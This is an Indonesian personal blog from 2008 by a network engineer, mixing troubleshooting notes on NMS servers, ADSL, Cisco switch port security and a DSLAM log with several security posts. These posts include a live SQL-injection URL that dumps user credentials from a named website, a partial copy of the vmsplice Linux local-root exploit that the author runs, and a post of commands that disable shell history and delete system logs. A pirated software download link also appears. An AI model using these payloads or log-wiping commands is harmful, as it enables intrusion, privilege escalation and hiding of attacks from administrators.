Saturday, February 16, 2008

TroubleShooting Network Management System

# uname -a
SunOS Datel1 5.8 Generic_117350-04 sun4u sparc SUNW,Sun-Fire-V250


The current date is: Sat 02/16/2008
The current time is: 15:54:26.87

Pagi-pagi berangkat ke kantor sabtu .... banyak kendala nms pada salah satu adsl tidak bisa diakses , berangkat ke semanggi , central transmisi , minta kunci satpam inget label nya n2000 huawei , masuk ke ruang nms

nms nya tidak running well , coba reboot , dinms ini ada 2 server primary dan secondary , dan yang secondary dipakai sebagai nms diarea Jakarta

nms secondary
saat booting terdapat error system

sehingga harus dilakukan fsck -F ufs /dev/rdsk/c0t0d0s0
database shutdown

ternyata belum berhasil .......

nms primary

boot server tunggu 20 menit .... tinggal makan dulu ?


kenapa lama banget ya 20 menit karena tunggu nms database sinkron ...

back to nms secondary

reboot dan lakukan command

fsck -F ufs /dev/rdsk/c0t0d0s0

done ......

Thursday, February 14, 2008

Seorang Bijak Berkata ....

Tuntutlah ilmu sampai ke negeri cina ... padi semakin berisi semakin menunduk itulah petuah bijak ... seperti kata orang dulu , pernah mendengar seorang awam dapat memecahkan kode-kode yang sifatnya rahasia ... dan seorang hacker dapat menembus keamanan yang harganya mencapai milyaran ... dan pembuat virus yang dapat melumpuhkan jaringan internet diseluruh dunia seperti pada tahun 2000 ( Nimda ) wonderfull , cobalah menjadi bijak ......

Hi, how do you know? is safey? how supposed to do?
how do you know this hole?

To Admin

Just find the hole and try find the bug , how to defense it
as the example read the www.milw0rm.com and packetstormsecurity.org
securing and hardening the system step by step ...

regards
iqbal@sekuritionline.net

nothing secure in this world :D


----- Original Message -----
From: "iqbal"
To:
Sent: Sunday, February 03, 2008 12:43 AM
Subject: Houston Windows Support: Here we are bug in your site


> This is an enquiry e-mail via http://houston.windowssupport.us from:
> iqbal
>
> hello admin
>
> i want report bug in your site ...
>
> http://houston.windowssupport.us/index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
>
> regards
>
> iqbal

masih banyak celah keamanan diluar sana dan cobalah menjadi bijak ...

Monday, February 11, 2008

MEMORI SMA ........

haiyah .... adsl mau connect kok statusnya down time ..... lampu adsl kelap kelip agak lama ... duh kabel nggak bener nih coba cari splitter dibalik lemari tarik cabut pasang daaaaaaan siiiip lampu kondisinya show time .....

ADSL Firmware Version

:
FwVer:3.7.6.1_A_TC3085 HwVer:T14.F7_1.0

Line State

:
Showtime

Modulation

:
G.DMT

Annex Mode

:
ANNEX_A


Downstream Upstream

SNR Margin

:
41.0 31.0 db

Line Attenuation

:
16.5 8.0 db

Data Rate

:
384 64 kbps

ok back to topic masih ingatkah dengan printer pita lx-800 atau lx-300 waktu jaman sma dulu gw punya printer lx-300 , bunyinya jangan tanya deh ... meledak sampai langit ke tujuh ... apalagi kalo ngeprint tengah malem ... jangan harap bisa tenang tuh yang tidur ... , dulu punya kendala mengenai printer ini ... apalagi pita jaman dulu terbilang mahal saat sma , kantong pas-pasan dompet butut dengan tulisan dagadu .... dah singset kena kanker juga tuh dompet ... :D
kebayang nggak kalo dapet tugas translate bahasa inggris dah gitu banyak yang harus diprint tiba-tiba pita printer habis ..... apa yang harus gw lakukan ya .....

have an idea nih

1. bongkar pita
2. ambil minyak rambut .. bisa apa aja asal minyak rambut ( dulu sih pake brylcreem )
3. oleskan ke pita printer hingga semua merata
4. pastikan dalam memoles sambil diputer tuh pita ( ada gearnya juga )
5. pasang kembali
6. lihat hasilnya + selamat mencoba

Cara ini terbilang ampuh kalo pita dalam kondisi sudah habis dan jika benar-benar kepepet
cukup 1 kali saja , kalo 2 kali diolesin dan pita lama-lama bisa jadi putih .. :D

source : pengalaman pribadi .......

Daripada Bosan

iseng-iseng daripada bosen buat skrip .c aja deeeeeeeeeeeeee

#include "stdio.h"

void main(void)
{
char *message[] = {"Iqbal", "Bosen"};
int i;
for(i = 0; i = 1; ++i)
printf("%s", message[i]);
printf("\n");
}

daripada bosen gw coba local exploit linux sendiri

Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium4 i386 GNU/Linux

dari milw0rm

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#els

http://milw0rm.com/exploits/5092

compile lalu jalankan :

TEGAAAAAAAAAANGG ......... INidikasi pertama keyboard gak bergerak ... mouse bergerak ...... indikasi terakhir bunyi beep terus menerus dan ngehang ...... heuheuhehuehue ... terpaksa restart neh linux .......

WARNING !!!!!!!! Jangan Mencoba Kalo penasaran silahkan saja ...... Securing and Hardening Linux ......

Sunday, February 10, 2008

Setting ADSL + WIFI + Speedy di Airlive

Neh berikut hasil ctrl + printscreen nya

untuk login by default airlive ke ip 192.168.2.1 , login : admin pass : airlive

ok pilih interface setup lalu lan dan masukkan speerti dibawah ini sesuai dengan user dan password speedy



untuk encapsulation pilih pppoe llc ( huawei )



di wifi masukkan wep 128 bit sesuai dengan kebutuhan



dibawah ini range untuk ip bisa memasukkan ip private sesuai dengan keinginan



mudah bukan .........

Trouble Shoot Radius Server

Digital UNIX V4.0F (Rev. 1229); Wed Oct 16 14:45:04 GMT 2002

The installation software has successfully installed your system.

There are logfiles that contain a record of your installation.
These are:

Pernah mendengar OS Digital Unix pada Unix , baru pertama kali denger sih nih os
ternyata ndak terbayang bisa handling kalo gak salah bawaan vendor IBM ... begitu login :


ternyata ada PID yang error atau tidak terbaca dari mesin unix ini , oracle + smc
neh berikut action yang dijalankan :

dbstart -> startup database
dbshut -> shutdown database
lsnrctl start -> startup listener
lsnrctl stop -> shutdown listener
dbora start -> startup database and listener
dbora stop -> shutdown database and listener

ok saat ini running well kembali ....

penasaran liat mesinnya ? ....





berantakan kan ? tanya kenapa ....... :D

Temanku Bukan Manusia .........

berantakan banget yaa mukanya .......




neh buat alat nya ke dunia maya modem + wifi airlive ....



wah kipasnya ikut ke snap ......

Port Security pada Switch

Neh ada port security di switch cisco supaya inget ....... maklum agak sedikit pelupa saya ...

Building configuration...

Current configuration : 1962 bytes
!
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch1
!
enable secret 5 $1$H0CB$xMI51Z59JK3H/hI5mVA1r1
!
ip subnet-zero
!
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
!
!
interface FastEthernet0/1
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address sticky
switchport port-security mac-address sticky 0006.7b00.b898
!
interface FastEthernet0/2
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address sticky
!
interface FastEthernet0/3
switchport access vlan 20
switchport mode access
switchport port-security
switchport port-security maximum 2
!
interface FastEthernet0/4
switchport access vlan 20
switchport mode access
switchport port-security
switchport port-security maximum 2
!
interface FastEthernet0/5
switchport access vlan 30
switchport mode access
switchport port-security
!
interface FastEthernet0/6
switchport access vlan 30
switchport mode access
switchport port-security
!
interface FastEthernet0/7
!
interface FastEthernet0/8
!
interface FastEthernet0/9
!
interface FastEthernet0/10
!
interface FastEthernet0/11
!
interface FastEthernet0/12
!
interface FastEthernet0/13
!
interface FastEthernet0/14
!
interface FastEthernet0/15
!
interface FastEthernet0/16
!
interface FastEthernet0/17
!
interface FastEthernet0/18
!
interface FastEthernet0/19
!
interface FastEthernet0/20
!
interface FastEthernet0/21
!
interface FastEthernet0/22
!
interface FastEthernet0/23
switchport mode trunk
!
interface FastEthernet0/24
switchport mode trunk
!
interface Vlan1
ip address 192.168.100.174 255.255.255.252
no ip route-cache
!
ip default-gateway 192.168.100.173
ip http server
!
line con 0
line vty 0 4
password cisco
login
line vty 5 15
password cisco
login
!
!
end

Bersih2x di linux

Skrip ini buat sapu bersih log yang ada di linux ......... sapu bersih ... deh

This is for removing logs

write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0

Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r

.......

mari mencoba

coba di backtrack ya ..

bt ~ # tail -f /var/log/messages
Feb 10 12:35:38 (none) kernel: scsi4 : SCSI emulation for USB Mass Storage devices
Feb 10 12:35:43 (none) kernel: scsi 4:0:0:0: Direct-Access Generic USB Disk 9.02 PQ: 0 ANSI: 2
Feb 10 12:35:43 (none) kernel: SCSI device sdb: 156301488 512-byte hdwr sectors (80026 MB)
Feb 10 12:35:43 (none) kernel: sdb: Write Protect is off
Feb 10 12:35:43 (none) kernel: SCSI device sdb: 156301488 512-byte hdwr sectors (80026 MB)
Feb 10 12:35:43 (none) kernel: sdb: Write Protect is off
Feb 10 12:35:43 (none) kernel: sdb: sdb1 sdb2 < sdb5 >
Feb 10 12:35:43 (none) kernel: sd 4:0:0:0: Attached scsi disk sdb
Feb 10 12:35:43 (none) kernel: sd 4:0:0:0: Attached scsi generic sg0 type 0
Feb 10 12:53:19 (none) -- MARK --

masih ada


180 ping 192.168.2.1
181 slapt-get
182 uname -a
183 id
184 w
185 ps -ef
186 arp
187 arp -a
188 tail -f /var/log/messages
189 history
bt ~ # history

masih ada juga .....


sekarang ketik command

rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -c ; history -r

bt ~ # history
1 history
2 tail -f /var/log/messages
3 history
bt ~ #

hilang semua lognya :D

jam 1 siang ...... refresh my brain now ......

Penanggulangan ARP Poisoning

Sniffing adalah salah satu aksi penetrasi yang paling susah untuk dihindari,
dengan bantuan tools seperti ettercap, tcpdump, nemesis dan lainnya aksi ini
masih bisa dan menjadi andalan para instruder sekrang… dengan sedikit trik
dan variasi teknik orang yg melakukan koneksi dengan SSH tunnel pun bisa di
sniiff data-nya sehingga proses login ke email dan lainya bisa di lihat secara
plain teks…!!!!

Berikut hasil pengubahahan ARP gateway dari dynamic menjadi static pada unix

Terlihat dibawah dynamic
bt ~ # arp -a
? (192.168.2.1) at 00:4F:6A:00:62:98 [ether] on eth1

Kita buat jadi statik

bt ~ # arp -s 192.168.2.1 00:4F:6A:00:62:98

oke make sure kita lihat lagi apakah sudah berjalan ...
bt ~ # arp -a
? (192.168.2.1) at 00:4F:6A:00:62:98 [ether] PERM on eth1

sudah .......

sebaiknya lakukan hal ini untuk mencegah kemungkinan sniffing mac address anda ....

Pengidola Router Cisco ......... :D

Boson NetSim for CCNP 7.0 | 26 MB

The Boson NetSim simulates both switching bridge tables and routing protocol tables to allow you to go OUTSIDE the labs. The Boson NetSim makes it possible to design and configure a network with 40 different router models and three different Catalyst models to choose from. BSCI, BCRAN, BCMSN and CIT labs are available in the current version.

Features included in the Boson NetSim for CCNP
- IPv6 addressing
- OSPFv3 using IPv6 addresses
- Multicasting configuration
- New command parser
- Improved command speed
- Lab compiler application to create your own lab packages
- New structure for the Lab Navigator
- New implementation of OSPF, now with Multi-Area
- Summarization for RIPv2 and EIGRP
- New implementation of the routing table
- Update utility included to download latest files available
- Smaller installer

Code:

http://rapidshare.com/files/65864973/Boson.Network.Simulator.7.for.CCNP.part1.rar
http://rapidshare.com/files/65864974/Boson.Network.Simulator.7.for.CCNP.part2.rar

DSLAM ADSL ...

Coba paste salah satu command DSLAM ........

=~=~=~=~=~=~=~=~=~=~=~= PuTTY log 2008.01.17 17:50:44 =~=~=~=~=~=~=~=~=~=~=~=


INFO MAJOR 2008-01-17 17:49:09 ALARM NAME : ADSL Port LOS
PARAS INFO : ADSL6/0/2 detected no signal on the port
DSLAM02-D2-KLD#show adsl line state All

INFO MAJOR 2008-01-17 17:49:11 ALARM NAME : ADSL ATU-R loss of power
PARAS INFO : ADSL6/0/2 ATU-R loss of its power

INFO MAJOR 2008-01-17 17:49:11 ALARM NAME : ADSL port status changed
PARAS INFO : ADSL6/0/2 status changed to activating!

INFO MAJOR 2008-01-17 17:49:12
ALARM NAME : Port link status change to down
PARAS INFO : Port Adsl6/0/2 down

DSLAM02-D2-KLD#show adsl line state All
interface LinkStatus SnrMgn SnrMgn tx-Power Rx-Power Tx-Rate Rx-Rate
ATUC(dB) ATUR(dB) (dBm) (dBm) (Kbps) (Kbps)
-------------------------------------------------------------------------------
Adsl0/0/0 active 31 31 9 11 384 64
Adsl0/0/1 active 31 27 14 10 384 64
Adsl0/0/2 active 31 43 14 11 384 64
Adsl0/0/3 activating 0 0 0 0 0 0
Adsl0/0/4 active 31 16 15 11 384 64
Adsl0/0/5 activating 0 0 0 0 0 0
Adsl0/0/6 activating 0 0 0 0 0 0
Adsl0/0/7 active 31 31 15 11 384 64
Adsl0/0/8 activating 0 0 0 0 0 0
Adsl0/0/9 activating 0 0 0 0 0 0
Adsl0/0/10 activating 0 0 0 0 0 0
Adsl0/0/11 activating 0 0 0 0 0 0
Adsl0/0/12 activating 0 0 0 0 0 0
Adsl0/0/13 active 16 3 20 12 10144 896
Adsl0/0/14 activating 0 0 0 0 0 0
Adsl0/0/15 activating 0 0 0 0 0 0
Adsl0/0/16 active 31 31 15 10 384 64
Adsl0/0/17 active 31 29 14 10 384 64
Adsl0/0/18 activating 0 0 0 0 0 0
Adsl0/0/19 activating 0 0 0 0 0 0
Adsl0/0/20 activating 0 0 0 0 0 0
Adsl0/0/21 activating 0 0 0 0 0 0
Adsl0/0/22 active 31 43 15 11 384 64
Adsl0/0/23 active 31 17 15 10 384 64
Adsl0/0/24 activating 0 0 0 0 0 0
Adsl0/0/25 activating 0 0 0 0 0 0
Adsl0/0/26 activating 0 0 0 0 0 0
Adsl0/0/27 active 29 10 15 10 384 64
Adsl0/0/28 activating 0 0 0 0 0 0
Adsl0/0/29 active 12 3 12 12 160 704
Adsl0/0/30 activating 0 0 0 0 0 0
Adsl0/0/31 activating 0 0 0 0 0 0
Adsl0/0/32 active 31 29 17 9 384 64
Adsl0/0/33 active 31 36 14 10 384 64
Adsl0/0/34 activating 0 0 0 0 0 0
Adsl0/0/35 activating 0 0 0 0 0 0
Adsl0/0/36 activating 0 0 0 0 0 0
Adsl0/0/37 active 31 13 14 9 384 64
Adsl0/0/38 activating 0 0 0 0 0 0
Adsl0/0/39 activating 0 0 0 0 0 0
Adsl0/0/40 activating 0 0 0 0 0 0
Adsl0/0/41 activating 0 0 0 0 0 0
Adsl0/0/42 activating 0 0 0 0 0 0
Adsl0/0/43 activating 0 0 0 0 0 0
Adsl0/0/44 activating 0 0 0 0 0 0
Adsl0/0/45 activating 0 0 0 0 0 0
Adsl0/0/46 active 31 16 15 11 384 64
Adsl0/0/47 activating 0 0 0 0 0 0
Adsl1/0/0 activating 0 0 0 0 0 0
Adsl1/0/1 activating 0 0 0 0 0 0
Adsl1/0/2 activating 0 0 0 0 0 0
Adsl1/0/3 active 31 11 15 11 384 64
Adsl1/0/4 active 9 36 13 9 384 64
Adsl1/0/5 activating 0 0 0 0 0 0
Adsl1/0/6 active 31 37 16 8 384 64
Adsl1/0/7 activating 0 0 0 0 0 0
Adsl1/0/8 activating 0 0 0 0 0 0
Adsl1/0/9 activating 0 0 0 0 0 0
Adsl1/0/10 activating 0 0 0 0 0 0
Adsl1/0/11 activating 0 0 0 0 0 0
Adsl1/0/12 active 31 42 12 10 384 64
Adsl1/0/13 activating 0 0 0 0 0 0
Adsl1/0/14 active 31 23 15 11 384 64
Adsl1/0/15 activating 0 0 0 0 0 0
Adsl1/0/16 activating 0 0 0 0 0 0
Adsl1/0/17 activating 0 0 0 0 0 0
Adsl1/0/18 activating 0 0 0 0 0 0
Adsl1/0/19 activating 0 0 0 0 0 0
Adsl1/0/20 activating 0 0 0 0 0 0
Adsl1/0/21 active 31 16 15 10 384 64
Adsl1/0/22 activating 0 0 0 0 0 0
Adsl1/0/23 activating 0 0 0 0 0 0
Adsl1/0/24 activating 0 0 0 0 0 0
Adsl1/0/25 activating 0 0 0 0 0 0
Adsl1/0/26 activating 0 0 0 0 0 0
Adsl1/0/27 activating 0 0 0 0 0 0
Adsl1/0/28 activating 0 0 0 0 0 0
Adsl1/0/29 activating 0 0 0 0 0 0
Adsl1/0/30 activating 0 0 0 0 0 0
Adsl1/0/31 activating 0 0 0 0 0 0
Adsl1/0/32 activating 0 0 0 0 0 0
Adsl1/0/33 activating 0 0 0 0 0 0
Adsl1/0/34 activating 0 0 0 0 0 0
Adsl1/0/35 activating 0 0 0 0 0 0
Adsl1/0/36 activating 0 0 0 0 0 0
Adsl1/0/37 activating 0 0 0 0 0 0
Adsl1/0/38 activating 0 0 0 0 0 0
Adsl1/0/39 active 31 30 14 10 384 64
Adsl1/0/40 activating 0 0 0 0 0 0
Adsl1/0/41 activating 0 0 0 0 0 0
Adsl1/0/42 activating 0 0 0 0 0 0
Adsl1/0/43 active 31 21 15 11 384 64
Adsl1/0/44 activating 0 0 0 0 0 0
Adsl1/0/45 activating 0 0 0 0 0 0
Adsl1/0/46 activating 0 0 0 0 0 0
Adsl1/0/47 activating 0 0 0 0 0 0
Adsl2/0/0 active 31 41 14 10 384 64
Adsl2/0/1 activating 0 0 0 0 0 0
Adsl2/0/2 activating 0 0 0 0 0 0
Adsl2/0/3 activating 0 0 0 0 0 0
Adsl2/0/4 active 31 19 12 11 384 64
Adsl2/0/5 active 31 31 3 11 384 64
Adsl2/0/6 activating 0 0 0 0 0 0
Adsl2/0/7 activating 0 0 0 0 0 0
Adsl2/0/8 activating 0 0 0 0 0 0
Adsl2/0/9 active 31 31 11 11 384 64
Adsl2/0/10 activating 0 0 0 0 0 0
Adsl2/0/11 active 31 17 15 11 384 64
Adsl2/0/12 activating 0 0 0 0 0 0
Adsl2/0/13 activating 0 0 0 0 0 0
Adsl2/0/14 activating 0 0 0 0 0 0
Adsl2/0/15 active 31 26 15 10 384 64
Adsl2/0/16 active 31 25 14 11 384 64
Adsl2/0/17 activating 0 0 0 0 0 0
Adsl2/0/18 active 31 23 15 11 384 64
Adsl2/0/19 activating 0 0 0 0 0 0
Adsl2/0/20 activating 0 0 0 0 0 0
Adsl2/0/21 active 31 38 13 9 384 64
Adsl2/0/22 active 31 31 13 10 384 64
Adsl2/0/23 active 31 24 13 10 384 64
Adsl2/0/24 activating 0 0 0 0 0 0
Adsl2/0/25 activating 0 0 0 0 0 0
Adsl2/0/26 active 31 31 -4 11 384 64
Adsl2/0/27 active 31 37 14 11 384 64
Adsl2/0/28 active 31 31 14 10 384 64
Adsl2/0/29 activating 0 0 0 0 0 0
Adsl2/0/30 activating 0 0 0 0 0 0
Adsl2/0/31 activating 0 0 0 0 0 0
Adsl2/0/32 activating 0 0 0 0 0 0
Adsl2/0/33 activating 0 0 0 0 0 0
Adsl2/0/34 active 31 26 13 11 384 64
Adsl2/0/35 activating 0 0 0 0 0 0
Adsl2/0/36 activating 0 0 0 0 0 0
Adsl2/0/37 activating 0 0 0 0 0 0
Adsl2/0/38 active 31 16 15 10 384 64
Adsl2/0/39 activating 0 0 0 0 0 0
Adsl2/0/40 active 31 31 15 10 384 64
Adsl2/0/41 activating 0 0 0 0 0 0
Adsl2/0/42 active 31 31 9 10 384 64
Adsl2/0/43 active 31 31 15 11 384 64
Adsl2/0/44 activating 0 0 0 0 0 0
Adsl2/0/45 activating 0 0 0 0 0 0
Adsl2/0/46 activating 0 0 0 0 0 0
Adsl2/0/47 activating 0 0 0 0 0 0
Adsl3/0/0 activating 0 0 0 0 0 0
Adsl3/0/1 activating 0 0 0 0 0 0
Adsl3/0/2 activating 0 0 0 0 0 0
Adsl3/0/3 activating 0 0 0 0 0 0
Adsl3/0/4 activating 0 0 0 0 0 0
Adsl3/0/5 activating 0 0 0 0 0 0
Adsl3/0/6 active 31 30 13 11 384 64
Adsl3/0/7 activating 0 0 0 0 0 0
Adsl3/0/8 activating 0 0 0 0 0 0
Adsl3/0/9 activating 0 0 0 0 0 0
Adsl3/0/10 activating 0 0 0 0 0 0
Adsl3/0/11 active 31 30 11 10 384 64
Adsl3/0/12 activating 0 0 0 0 0 0
Adsl3/0/13 activating 0 0 0 0 0 0
Adsl3/0/14 activating 0 0 0 0 0 0
Adsl3/0/15 active 13 7 19 12 3168 896
Adsl3/0/16 activating 0 0 0 0 0 0
Adsl3/0/17 activating 0 0 0 0 0 0
Adsl3/0/18 activating 0 0 0 0 0 0
Adsl3/0/19 activating 0 0 0 0 0 0
Adsl3/0/20 activating 0 0 0 0 0 0
Adsl3/0/21 activating 0 0 0 0 0 0
Adsl3/0/22 activating 0 0 0 0 0 0
Adsl3/0/23 activating 0 0 0 0 0 0
Adsl3/0/24 activating 0 0 0 0 0 0
Adsl3/0/25 active 31 49 16 10 384 64
Adsl3/0/26 activating 0 0 0 0 0 0
Adsl3/0/27 active 31 31 14 11 384 64
Adsl3/0/28 activating 0 0 0 0 0 0
Adsl3/0/29 activating 0 0 0 0 0 0
Adsl3/0/30 active 31 31 15 11 384 64
Adsl3/0/31 activating 0 0 0 0 0 0
Adsl3/0/32 activating 0 0 0 0 0 0
Adsl3/0/33 activating 0 0 0 0 0 0
Adsl3/0/34 activating 0 0 0 0 0 0
Adsl3/0/35 activating 0 0 0 0 0 0
Adsl3/0/36 activating 0 0 0 0 0 0
Adsl3/0/37 activating 0 0 0 0 0 0
Adsl3/0/38 activating 0 0 0 0 0 0
Adsl3/0/39 activating 0 0 0 0 0 0
Adsl3/0/40 active 31 27 15 11 384 64
Adsl3/0/41 activating 0 0 0 0 0 0
Adsl3/0/42 activating 0 0 0 0 0 0
Adsl3/0/43 active 31 38 0 9 384 64
Adsl3/0/44 activating 0 0 0 0 0 0
Adsl3/0/45 activating 0 0 0 0 0 0
Adsl3/0/46 activating 0 0 0 0 0 0
Adsl3/0/47 activating 0 0 0 0 0 0
Adsl4/0/0 activating 0 0 0 0 0 0
Adsl4/0/1 active 31 31 14 9 384 64
Adsl4/0/2 active 29 6 8 11 64 64
Adsl4/0/3 activating 0 0 0 0 0 0
Adsl4/0/4 active 31 31 14 10 384 64
Adsl4/0/5 activating 0 0 0 0 0 0
Adsl4/0/6 activating 0 0 0 0 0 0
Adsl4/0/7 active 31 14 14 9 384 64
Adsl4/0/8 activating 0 0 0 0 0 0
Adsl4/0/9 active 31 15 14 11 384 64
Adsl4/0/10 activating 0 0 0 0 0 0
Adsl4/0/11 activating 0 0 0 0 0 0
Adsl4/0/12 active 31 9 14 10 384 64
Adsl4/0/13 activating 0 0 0 0 0 0
Adsl4/0/14 activating 0 0 0 0 0 0
Adsl4/0/15 activating 0 0 0 0 0 0
Adsl4/0/16 active 31 14 13 10 384 64
Adsl4/0/17 active 31 23 15 9 384 64
Adsl4/0/18 activating 0 0 0 0 0 0
Adsl4/0/19 active 31 37 4 9 384 64
Adsl4/0/20 activating 0 0 0 0 0 0
Adsl4/0/21 active 31 31 12 11 384 64
Adsl4/0/22 activating 0 0 0 0 0 0
Adsl4/0/23 activating 0 0 0 0 0 0
Adsl4/0/24 activating 0 0 0 0 0 0
Adsl4/0/25 activating 0 0 0 0 0 0
Adsl4/0/26 activating 0 0 0 0 0 0
Adsl4/0/27 active 31 29 13 10 384 64
Adsl4/0/28 activating 0 0 0 0 0 0
Adsl4/0/29 active 31 17 13 10 384 64
Adsl4/0/30 activating 0 0 0 0 0 0
Adsl4/0/31 active 31 43 14 10 384 64
Adsl4/0/32 activating 0 0 0 0 0 0
Adsl4/0/33 activating 0 0 0 0 0 0
Adsl4/0/34 activating 0 0 0 0 0 0
Adsl4/0/35 active 31 31 13 10 384 64
Adsl4/0/36 activating 0 0 0 0 0 0
Adsl4/0/37 activating 0 0 0 0 0 0
Adsl4/0/38 active 31 16 14 10 384 64
Adsl4/0/39 activating 0 0 0 0 0 0
Adsl4/0/40 activating 0 0 0 0 0 0
Adsl4/0/41 activating 0 0 0 0 0 0
Adsl4/0/42 activating 0 0 0 0 0 0
Adsl4/0/43 activating 0 0 0 0 0 0
Adsl4/0/44 activating 0 0 0 0 0 0
Adsl4/0/45 activating 0 0 0 0 0 0
Adsl4/0/46 activating 0 0 0 0 0 0
Adsl4/0/47 activating 0 0 0 0 0 0
Adsl5/0/0 activating 0 0 0 0 0 0
Adsl5/0/1 active 31 10 15 10 384 64
Adsl5/0/2 activating 0 0 0 0 0 0
Adsl5/0/3 active 31 9 15 10 384 64
Adsl5/0/4 activating 0 0 0 0 0 0
Adsl5/0/5 activating 0 0 0 0 0 0
Adsl5/0/6 activating 0 0 0 0 0 0
Adsl5/0/7 activating 0 0 0 0 0 0
Adsl5/0/8 activating 0 0 0 0 0 0
Adsl5/0/9 activating 0 0 0 0 0 0
Adsl5/0/10 active 31 25 16 11 384 64
Adsl5/0/11 activating 0 0 0 0 0 0
Adsl5/0/12 activating 0 0 0 0 0 0
Adsl5/0/13 active 30 24 14 10 384 64
Adsl5/0/14 activating 0 0 0 0 0 0
Adsl5/0/15 activating 0 0 0 0 0 0
Adsl5/0/16 activating 0 0 0 0 0 0
Adsl5/0/17 activating 0 0 0 0 0 0
Adsl5/0/18 activating 0 0 0 0 0 0
Adsl5/0/19 activating 0 0 0 0 0 0
Adsl5/0/20 activating 0 0 0 0 0 0
Adsl5/0/21 activating 0 0 0 0 0 0
Adsl5/0/22 active 31 29 10 9 384 64
Adsl5/0/23 active 31 15 14 11 384 64
Adsl5/0/24 activating 0 0 0 0 0 0
Adsl5/0/25 activating 0 0 0 0 0 0
Adsl5/0/26 activating 0 0 0 0 0 0
Adsl5/0/27 activating 0 0 0 0 0 0
Adsl5/0/28 activating 0 0 0 0 0 0
Adsl5/0/29 active 31 14 13 11 384 64
Adsl5/0/30 activating 0 0 0 0 0 0
Adsl5/0/31 activating 0 0 0 0 0 0
Adsl5/0/32 activating 0 0 0 0 0 0
Adsl5/0/33 activating 0 0 0 0 0 0
Adsl5/0/34 activating 0 0 0 0 0 0
Adsl5/0/35 activating 0 0 0 0 0 0
Adsl5/0/36 activating 0 0 0 0 0 0
Adsl5/0/37 activating 0 0 0 0 0 0
Adsl5/0/38 active 31 31 13 10 384 64
Adsl5/0/39 activating 0 0 0 0 0 0
Adsl5/0/40 activating 0 0 0 0 0 0
Adsl5/0/41 activating 0 0 0 0 0 0
Adsl5/0/42 activating 0 0 0 0 0 0
Adsl5/0/43 active 31 31 14 10 384 64
Adsl5/0/44 activating 0 0 0 0 0 0
Adsl5/0/45 activating 0 0 0 0 0 0
Adsl5/0/46 active 31 35 4 9 384 64
Adsl5/0/47 activating 0 0 0 0 0 0
Adsl6/0/0 activating 0 0 0 0 0 0
Adsl6/0/1 activating 0 0 0 0 0 0
Adsl6/0/2 activating 0 0 0 0 0 0
